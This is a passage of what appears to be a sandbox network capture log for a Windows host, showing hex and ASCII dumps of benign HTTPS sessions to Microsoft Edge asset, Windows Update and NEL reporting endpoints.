af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 Data Ascii: 4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;\|.'Ocl7vUh&n{G]%vHN@
2024-09-06 07:58:25 UTC	16384	IN	Data Raw: 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 Data Ascii: VG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0"1OvD#jK_F(Mu,abs&0`K`\|'5Z:-#BoFX1-3JESJY(bJX@D[93&Pq<jy@^2%S^?`>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49787	13.107.246.40	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:26 UTC	711	OUT	GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.47 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 07:58:26 UTC	583	IN	HTTP/1.1 200 OK Date: Fri, 06 Sep 2024 07:58:26 GMT Content-Type: application/octet-stream Content-Length: 70207 Connection: close Content-Encoding: gzip Last-Modified: Fri, 02 Aug 2024 18:10:35 GMT ETag: 0x8DCB31E67C22927 x-ms-request-id: ed2d6e16-301e-006f-0748-ffc0d3000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240906T075826Z-16579567576j7nvvu5n0ytgs1c0000000dr000000000bfkf Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-09-06 07:58:26 UTC	15801	IN	Data Raw: 1f 8b 08 08 1a 21 ad 66 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: !fasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
2024-09-06 07:58:26 UTC	16384	IN	Data Raw: 4a b0 09 cb 82 45 ac c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 Data Ascii: JEqb,0Rte\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1
2024-09-06 07:58:26 UTC	16384	IN	Data Raw: 2f 4d 35 19 b9 3f d5 c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 Data Ascii: /M5?Rg\|M kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|c
2024-09-06 07:58:26 UTC	16384	IN	Data Raw: 99 dc 5a 2e 69 cf 52 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 Data Ascii: Z.iRAHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`
2024-09-06 07:58:26 UTC	5254	IN	Data Raw: 29 50 5f 50 34 9a d3 9a 2a 83 ab 27 93 58 c5 2b d2 9c af 2b 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 Data Ascii: )P_P4*'X++NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt\|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49795	13.107.246.40	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:29 UTC	478	OUT	GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: ProductCategories Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 07:58:29 UTC	538	IN	HTTP/1.1 200 OK Date: Fri, 06 Sep 2024 07:58:29 GMT Content-Type: application/octet-stream Content-Length: 82989 Connection: close Last-Modified: Thu, 25 May 2023 20:28:02 GMT ETag: 0x8DB5D5E89CE25EB x-ms-request-id: f9285315-801e-0010-24d3-ff5ee1000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240906T075829Z-16579567576h266g9d6dee9ff80000000dt0000000006upe Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-09-06 07:58:29 UTC	15846	IN	Data Raw: 0a 22 08 f2 33 12 1d 0a 0c 43 61 72 20 26 20 47 61 72 61 67 65 12 0d 42 65 6c 74 73 20 26 20 48 6f 73 65 73 0a 23 08 d7 2b 12 1e 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 09 41 69 72 20 50 75 6d 70 73 0a 21 08 b8 22 12 1c 0a 0c 43 61 72 20 26 20 47 61 72 61 67 65 12 0c 42 6f 64 79 20 53 74 79 6c 69 6e 67 0a 34 08 c3 35 12 2f 0a 18 47 6f 75 72 6d 65 74 20 46 6f 6f 64 20 26 20 43 68 6f 63 6f 6c 61 74 65 12 13 53 70 69 63 65 73 20 26 20 53 65 61 73 6f 6e 69 6e 67 73 0a 27 08 a4 2c 12 22 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 0d 53 6c 65 65 70 69 6e 67 20 47 65 61 72 0a 21 08 f5 36 12 1c 0a 0d 4c 61 77 6e 20 26 20 47 61 72 64 65 6e 12 0b 48 79 64 72 6f 70 6f 6e 69 63 73 0a 39 08 61 12 35 0a 11 42 6f 6f 6b 73 20 26 20 4d Data Ascii: "3Car & GarageBelts & Hoses#+Sports & OutdoorsAir Pumps!"Car & GarageBody Styling45/Gourmet Food & ChocolateSpices & Seasonings',"Sports & OutdoorsSleeping Gear!6Lawn & GardenHydroponics9a5Books & M
2024-09-06 07:58:29 UTC	16384	IN	Data Raw: 53 79 73 74 65 6d 20 41 63 63 65 73 73 6f 72 69 65 73 0a 20 08 a2 26 12 1b 0a 10 54 6f 6f 6c 73 20 26 20 48 61 72 64 77 61 72 65 12 07 54 6f 69 6c 65 74 73 0a 2c 08 f3 28 12 27 0a 14 4b 69 74 63 68 65 6e 20 26 20 48 6f 75 73 65 77 61 72 65 73 12 0f 45 6c 65 63 74 72 69 63 20 4d 69 78 65 72 73 0a 21 08 c0 32 12 1c 0a 04 54 6f 79 73 12 14 53 61 6e 64 62 6f 78 20 26 20 42 65 61 63 68 20 54 6f 79 73 0a 35 08 a5 25 12 30 0a 18 47 6f 75 72 6d 65 74 20 46 6f 6f 64 20 26 20 43 68 6f 63 6f 6c 61 74 65 12 14 53 65 61 66 6f 6f 64 20 43 6f 6d 62 69 6e 61 74 69 6f 6e 73 0a 24 08 d7 27 12 1f 0a 10 48 6f 6d 65 20 46 75 72 6e 69 73 68 69 6e 67 73 12 0b 43 61 6b 65 20 53 74 61 6e 64 73 0a 2e 08 a4 28 12 29 0a 14 4b 69 74 63 68 65 6e 20 26 20 48 6f 75 73 65 77 61 72 65 73 Data Ascii: System Accessories &Tools & HardwareToilets,('Kitchen & HousewaresElectric Mixers!2ToysSandbox & Beach Toys5%0Gourmet Food & ChocolateSeafood Combinations$'Home FurnishingsCake Stands.()Kitchen & Housewares
2024-09-06 07:58:29 UTC	16384	IN	Data Raw: 47 61 72 61 67 65 20 46 6c 6f 6f 72 20 43 61 72 65 0a 25 08 f0 2a 12 20 0a 0f 4f 66 66 69 63 65 20 50 72 6f 64 75 63 74 73 12 0d 50 61 70 65 72 20 50 75 6e 63 68 65 73 0a 2d 08 c1 2c 12 28 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 13 42 69 63 79 63 6c 65 20 41 63 63 65 73 73 6f 72 69 65 73 0a 22 08 a2 27 12 1d 0a 10 48 6f 6d 65 20 46 75 72 6e 69 73 68 69 6e 67 73 12 09 4e 6f 76 65 6c 74 69 65 73 0a 16 08 f3 29 12 11 0a 05 4d 75 73 69 63 12 08 45 78 65 72 63 69 73 65 0a 22 08 8e 31 12 1d 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 08 53 77 69 6d 6d 69 6e 67 0a 26 08 d4 21 12 21 0a 12 42 65 61 75 74 79 20 26 20 46 72 61 67 72 61 6e 63 65 12 0b 4d 61 6b 65 75 70 20 4b 69 74 73 0a 3c 08 a5 2a 12 37 0a 13 4d 75 73 69 63 61 6c Data Ascii: Garage Floor Care%* Office ProductsPaper Punches-,(Sports & OutdoorsBicycle Accessories"'Home FurnishingsNovelties)MusicExercise"1Sports & OutdoorsSwimming&!!Beauty & FragranceMakeup Kits<*7Musical
2024-09-06 07:58:29 UTC	16384	IN	Data Raw: 6e 20 26 20 47 61 72 64 65 6e 12 05 42 75 6c 62 73 0a 21 08 a3 21 12 1c 0a 12 42 65 61 75 74 79 20 26 20 46 72 61 67 72 61 6e 63 65 12 06 4d 61 6b 65 75 70 0a 2d 08 49 12 29 0a 11 42 6f 6f 6b 73 20 26 20 4d 61 67 61 7a 69 6e 65 73 12 14 42 75 73 69 6e 65 73 73 20 26 20 45 63 6f 6e 6f 6d 69 63 73 0a 23 08 d5 23 12 1e 0a 09 43 6f 6d 70 75 74 69 6e 67 12 11 45 78 70 61 6e 73 69 6f 6e 20 4d 6f 64 75 6c 65 73 0a 2f 08 a2 24 12 2a 0a 0b 45 6c 65 63 74 72 6f 6e 69 63 73 12 1b 43 44 20 50 6c 61 79 65 72 73 20 26 20 53 74 65 72 65 6f 20 53 79 73 74 65 6d 73 0a 1f 08 d4 26 12 1a 0a 10 48 6f 6d 65 20 46 75 72 6e 69 73 68 69 6e 67 73 12 06 51 75 69 6c 74 73 0a 22 08 86 23 12 1d 0a 10 43 6c 6f 74 68 69 6e 67 20 26 20 53 68 6f 65 73 12 09 55 6e 64 65 72 77 65 61 72 0a Data Ascii: n & GardenBulbs!!Beauty & FragranceMakeup-I)Books & MagazinesBusiness & Economics##ComputingExpansion Modules/$*ElectronicsCD Players & Stereo Systems&Home FurnishingsQuilts"#Clothing & ShoesUnderwear
2024-09-06 07:58:29 UTC	16384	IN	Data Raw: 4f 75 74 64 6f 6f 72 73 12 0d 53 6c 65 65 70 69 6e 67 20 42 61 67 73 0a 24 08 bd 21 12 1f 0a 12 42 65 61 75 74 79 20 26 20 46 72 61 67 72 61 6e 63 65 12 09 46 72 61 67 72 61 6e 63 65 0a 28 08 63 12 24 0a 11 42 6f 6f 6b 73 20 26 20 4d 61 67 61 7a 69 6e 65 73 12 0f 4d 75 73 69 63 20 4d 61 67 61 7a 69 6e 65 73 0a 1e 08 8a 2b 12 19 0a 0f 4f 66 66 69 63 65 20 50 72 6f 64 75 63 74 73 12 06 52 75 6c 65 72 73 0a 2d 08 a9 33 12 28 0a 09 43 6f 6d 70 75 74 69 6e 67 12 1b 50 72 69 6e 74 65 72 20 50 61 72 74 73 20 26 20 41 74 74 61 63 68 6d 65 6e 74 73 0a 27 08 ef 23 12 22 0a 09 43 6f 6d 70 75 74 69 6e 67 12 15 54 68 69 6e 20 43 6c 69 65 6e 74 20 43 6f 6d 70 75 74 65 72 73 0a 37 08 bc 24 12 32 0a 0b 45 6c 65 63 74 72 6f 6e 69 63 73 12 23 49 6e 73 74 61 6c 6c 61 74 69 Data Ascii: OutdoorsSleeping Bags$!Beauty & FragranceFragrance(c$Books & MagazinesMusic Magazines+Office ProductsRulers-3(ComputingPrinter Parts & Attachments'#"ComputingThin Client Computers7$2Electronics#Installati
2024-09-06 07:58:29 UTC	1607	IN	Data Raw: 43 61 72 20 26 20 47 61 72 61 67 65 12 1f 53 6e 6f 77 6d 6f 62 69 6c 65 20 26 20 41 54 56 20 53 6b 69 73 20 26 20 52 75 6e 6e 65 72 73 0a 23 08 a2 21 12 1e 0a 12 42 65 61 75 74 79 20 26 20 46 72 61 67 72 61 6e 63 65 12 08 54 77 65 65 7a 65 72 73 0a 30 08 8e 33 12 2b 0a 0c 50 65 74 20 53 75 70 70 6c 69 65 73 12 1b 50 65 74 20 48 61 62 69 74 61 74 20 26 20 43 61 67 65 20 53 75 70 70 6c 69 65 73 0a 29 08 d4 23 12 24 0a 09 43 6f 6d 70 75 74 69 6e 67 12 17 44 69 67 69 74 61 6c 20 4d 65 64 69 61 20 52 65 63 65 69 76 65 72 73 0a 2a 08 f3 2b 12 25 0a 11 53 70 6f 72 74 73 20 26 20 4f 75 74 64 6f 6f 72 73 12 10 42 6f 61 74 20 4d 61 69 6e 74 65 6e 61 6e 63 65 0a 22 08 d7 26 12 1d 0a 10 48 6f 6d 65 20 46 75 72 6e 69 73 68 69 6e 67 73 12 09 46 75 72 6e 69 74 75 72 65 Data Ascii: Car & GarageSnowmobile & ATV Skis & Runners#!Beauty & FragranceTweezers03+Pet SuppliesPet Habitat & Cage Supplies)#$ComputingDigital Media Receivers*+%Sports & OutdoorsBoat Maintenance"&Home FurnishingsFurniture

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49808	13.85.23.86	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:41 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=slDVAaXtKD+FwpE&MD=5rttdFzP HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-06 07:58:41 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 461b2c17-6750-43f1-9ca6-aaccc6ae3fd5 MS-RequestId: 10460686-b5f0-44c0-9f0d-c6d24330d69e MS-CV: UgK4EgCI/EaYO9Hh.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 06 Sep 2024 07:58:40 GMT Connection: close Content-Length: 30005
2024-09-06 07:58:41 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-09-06 07:58:41 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49896	23.200.0.9	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:59:17 UTC	442	OUT	OPTIONS /api/report?cat=bingbusiness HTTP/1.1 Host: bzib.nelreports.net Connection: keep-alive Origin: https://business.bing.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 07:59:17 UTC	331	IN	HTTP/1.1 429 Too Many Requests Content-Length: 0 Date: Fri, 06 Sep 2024 07:59:17 GMT Connection: close PMUSER_FORMAT_QS: X-CDN-TraceId: 0.09ac2d17.1725609557.79949ba Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: * Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.7	51427	23.219.161.132	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 08:01:17 UTC	442	OUT	OPTIONS /api/report?cat=bingbusiness HTTP/1.1 Host: bzib.nelreports.net Connection: keep-alive Origin: https://business.bing.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 08:01:17 UTC	332	IN	HTTP/1.1 429 Too Many Requests Content-Length: 0 Date: Fri, 06 Sep 2024 08:01:17 GMT Connection: close PMUSER_FORMAT_QS: X-CDN-TraceId: 0.84112317.1725609677.1bf19a05 Access-Control-Allow-Credentials: false Access-Control-Allow-Methods: * Access-Control-Allow-Methods: GET, OPTIONS, POST Access-Control-Allow-Origin: *

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.7	51433	13.107.246.40	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 08:01:20 UTC	470	OUT	GET /assets/addressbar_uu_files.en-gb/1.0.2/asset?assetgroup=AddressBar HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: AddressBar Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 08:01:21 UTC	533	IN	HTTP/1.1 200 OK Date: Fri, 06 Sep 2024 08:01:21 GMT Content-Type: application/octet-stream Content-Length: 403024 Connection: close Last-Modified: Thu, 19 Oct 2023 17:36:16 GMT ETag: 0x8DBD0C9E5CD1B3B x-ms-request-id: f36c2698-b01e-0031-5b32-0033d0000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240906T080120Z-16579567576h9nndaeer0cv35w0000000dm0000000000c8p Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
